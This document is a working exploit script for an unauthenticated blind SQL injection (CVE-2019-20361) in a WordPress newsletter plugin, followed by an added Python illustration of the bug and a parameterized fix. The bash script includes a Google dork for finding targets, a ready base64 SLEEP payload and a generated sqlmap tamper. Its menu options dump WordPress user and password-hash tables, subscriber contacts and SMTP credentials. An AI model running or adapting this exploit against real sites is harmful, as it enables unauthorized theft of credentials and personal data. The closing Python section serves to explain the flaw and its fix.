```bash
#!/usr/bin/env bash
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
#
# The open-tracking endpoint (?es=open&hash=...) base64-decodes the hash
# parameter into JSON and concatenates its contact_id field into an INSERT
# without escaping. A crafted contact_id closes the VALUES tuple, appends a
# second tuple carrying an arbitrary subquery, and reopens a third tuple that
# the plugin's own code closes, which gives unauthenticated time-based blind
# SQL injection.

# Base64 hash whose contact_id injects (SELECT SLEEP(5)); raw_commands shows
# how it is produced.
SLEEP_HASH='eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo'

main () {
    header
    if [ "$#" -ne 1 ]; then
        echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
        echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
        exit 1
    fi
    url=$1
    echo ' Target URL : ' "$url"
    echo ' Generating sqlmap tamper script in /tmp'
    gen_sqlmap_tamper
    # Kept as an array so the '&' and '*' in the URL reach sqlmap literally
    # instead of being glob-expanded from an unquoted string.
    sqlmap_cmd=(sqlmap -u "${url}?es=open&hash=*" --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3)
    echo ' SQLMap base command : ' "${sqlmap_cmd[*]}"
    while true
    do
        sleep 1
        echo ''
        echo " Possible choices: "
        echo ''
        echo "0) Exit"
        echo "1) Simple vulnerability test SLEEP(5)"
        echo "2) Vulnerability test with SQLMap "
        echo "3) Get WP users data"
        echo "4) Get subscribers information"
        echo "5) Get 'Simple WP SMTP' settings"
        echo ''
        echo -n ' Choice number => '
        read -r n
        case $n in
            0) exit ;;
            1) echo 'Testing SLEEP(5)...'
               sleep_test ;;
            2) "${sqlmap_cmd[@]}" ;;
            3) "${sqlmap_cmd[@]}" -T wp_users,wp_usermeta --dump ;;
            4) "${sqlmap_cmd[@]}" -T wp_ig_contacts --dump ;;
            5) "${sqlmap_cmd[@]}" --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
            *) echo "Invalid option" ;;
        esac
    done
}

# Sends the SLEEP(5) hash and measures the round trip with curl's own
# locale-independent timer; a response that takes 5 s or more means the
# injected subquery ran. (Matching the output of the `time` keyword only
# works in locales that print a decimal comma.)
sleep_test () {
    elapsed=$(curl -s -k -o /dev/null -w '%{time_total}' "${url}?es=open&hash=${SLEEP_HASH}")
    if awk -v t="$elapsed" 'BEGIN { exit !(t + 0 >= 5) }'; then
        echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m"
    else
        echo ' [-] Not vulnerable'
    fi
}

header () {
    border=$(printf '%96s' '' | tr ' ' '#')
    echo ''
    echo " $border"
    printf ' #%-94s#\n' '' '  EXPLOIT' '  Email Subscribers & Newsletters < 4.3.1' '  Unauthenticated Blind SQL Injection' '  KBAZ' ''
    echo " $border"
    echo ''
}

# Reference commands for manual use (not called by the menu).
raw_commands () {
    # Produce the SLEEP(5) hash. echo joins its arguments with a space, so the
    # contact_id value ends up padded with a space on each side, which MySQL
    # tolerates.
    echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0
    # Manual SLEEP(5) probe: prints the total request time in seconds.
    curl -s -k -o /dev/null -w '%{time_total}\n' "http://127.0.0.1/?es=open&hash=${SLEEP_HASH}"
    # sqlmap through the tamper script; append one of the following to it:
    #   -T wp_users,wp_usermeta --dump
    #   -T wp_ig_contacts --dump
    #   --sql-query 'select * from wp_options where option_name="swpsmtp_options"'
    sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
}

gen_sqlmap_tamper () {
    touch /tmp/__init__.py
    # Quoted delimiter: nothing inside the tamper script is shell-expanded.
    cat << '_END' > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
import base64


def tamper(payload, **kwargs):
    # Legitimate hash, decoded:
    # {"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
    # Query the plugin builds from it:
    # INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
    # contact_id closes the first tuple, appends a tuple whose contact_id
    # is (1<payload>) so sqlmap's boolean/time payload lands inside an
    # expression, then opens a third tuple that the plugin closes itself.
    param = '{"contact_id":"'
    param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
    param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
    # b64encode runs on both Python 2 and 3 (encodestring was removed in
    # Python 3.9) and emits no embedded newlines.
    return base64.b64encode((param % (payload or '')).encode('utf-8')).decode('utf-8')
_END
}

main "$@"
```
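As an added example (not part of the original exploit or of the plugin), the following Python script makes the injection mechanics visible offline: it decodes the SLEEP(5) hash from the script above, renders the INSERT the plugin builds from it so the extra VALUES tuples can be counted, builds fresh hashes the way the sqlmap tamper does, and runs the same hostile contact_id through a parameterized INSERT. The INSERT template and the hash are copied from the script; `render_insert()` only illustrates the unescaped string-building pattern and is not the plugin's code, and the parameterized version uses an in-memory SQLite table with the same column names purely so it runs without a MySQL server (an assumption, since the real table is MySQL).

```python
"""Added example: decode the CVE-2019-20361 SLEEP(5) hash, show the INSERT it
produces, build hashes like the sqlmap tamper, and contrast a parameterized
INSERT. Not the exploit's or the plugin's own code."""
import base64
import json
import sqlite3

# Hash used by menu option 1 of the script above (copied from the page).
PAGE_HASH = "eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo"

# Query shape quoted in the tamper script's comment, as a format template so
# contact_id is interpolated unescaped (the vulnerable pattern, illustrative).
INSERT_TEMPLATE = (
    "INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, "
    "message_id, campaign_id, type) VALUES ('{ts}','{ts}','1','{contact_id}',"
    "'{message_id}','{campaign_id}','3') ON DUPLICATE KEY UPDATE "
    "created_at = created_at, count = count+1, updated_at = '{ts}'"
)


def decode_hash(h):
    """Base64-decode a hash into the JSON object the endpoint reads.

    The URL in the script omits the '=' padding; PHP's base64_decode accepts
    that but Python's b64decode does not, so pad to a multiple of four first.
    """
    padded = h + "=" * (-len(h) % 4)
    return json.loads(base64.b64decode(padded).decode("utf-8"))


def render_insert(fields, ts):
    """Render the INSERT by plain interpolation, exactly as the bug allows."""
    return INSERT_TEMPLATE.format(ts=ts, contact_id=fields["contact_id"],
                                  message_id=fields["message_id"],
                                  campaign_id=fields["campaign_id"])


def count_value_tuples(sql):
    """Number of tuples in the VALUES list: 1 for a benign hash, 3 once the
    contact_id has closed the first tuple and opened two more."""
    body = sql[sql.index("VALUES "):sql.index(" ON DUPLICATE")]
    return body.count("),(") + 1


def injected_contact_id(payload, ts=1594999398):
    """contact_id string in the shape the tamper script emits: close the
    tuple, add a tuple whose contact_id is (1<payload>), reopen a third."""
    return ("100','100','100','3'),('{ts}','{ts}','1',(1{p}),'100','100','3'),"
            "('{ts}','{ts}','1','100").format(ts=ts, p=payload)


def build_hash(contact_id):
    """Encode a hash the way the tamper does: compact JSON, base64, no newline."""
    obj = {"contact_id": contact_id, "campaign_id": "100", "message_id": "100",
           "email": "kbaz@sogetiesec.com",
           "guid": "kbazis-dabest-kbazis-dabest-baprou", "action": "open"}
    raw = json.dumps(obj, separators=(",", ":"))
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def safe_insert(contact_id, ts=1595001866):
    """Parameterized form of the same INSERT: the hostile contact_id is stored
    as data and exactly one row results. SQLite in memory is an assumption
    used only so this runs offline; the plugin's table lives in MySQL."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_ig_actions (created_at, updated_at, count, "
                "contact_id, message_id, campaign_id, type)")
    con.execute("INSERT INTO wp_ig_actions (created_at, updated_at, count, "
                "contact_id, message_id, campaign_id, type) "
                "VALUES (?,?,?,?,?,?,?)",
                (ts, ts, 1, contact_id, "100", "100", 3))
    rows = [r[0] for r in con.execute("SELECT contact_id FROM wp_ig_actions")]
    con.close()
    return rows


if __name__ == "__main__":
    fields = decode_hash(PAGE_HASH)
    sql = render_insert(fields, 1595001866)
    print(sql)
    print("VALUES tuples:", count_value_tuples(sql))
    print("tamper-style hash:", build_hash(injected_contact_id(" AND SLEEP(5)")))
    print("rows after parameterized insert:", len(safe_insert(fields["contact_id"])))
```

Running it prints the three-tuple INSERT that the page's hash produces; the middle tuple is where `(SELECT SLEEP(5))` executes, which is why the script's option 1 measures a delay rather than reading any response body. The same contact_id fed to `safe_insert()` produces one row with the whole string stored verbatim, which is the fix shape (`$wpdb->prepare()` in WordPress terms) rather than any escaping of the decoded JSON.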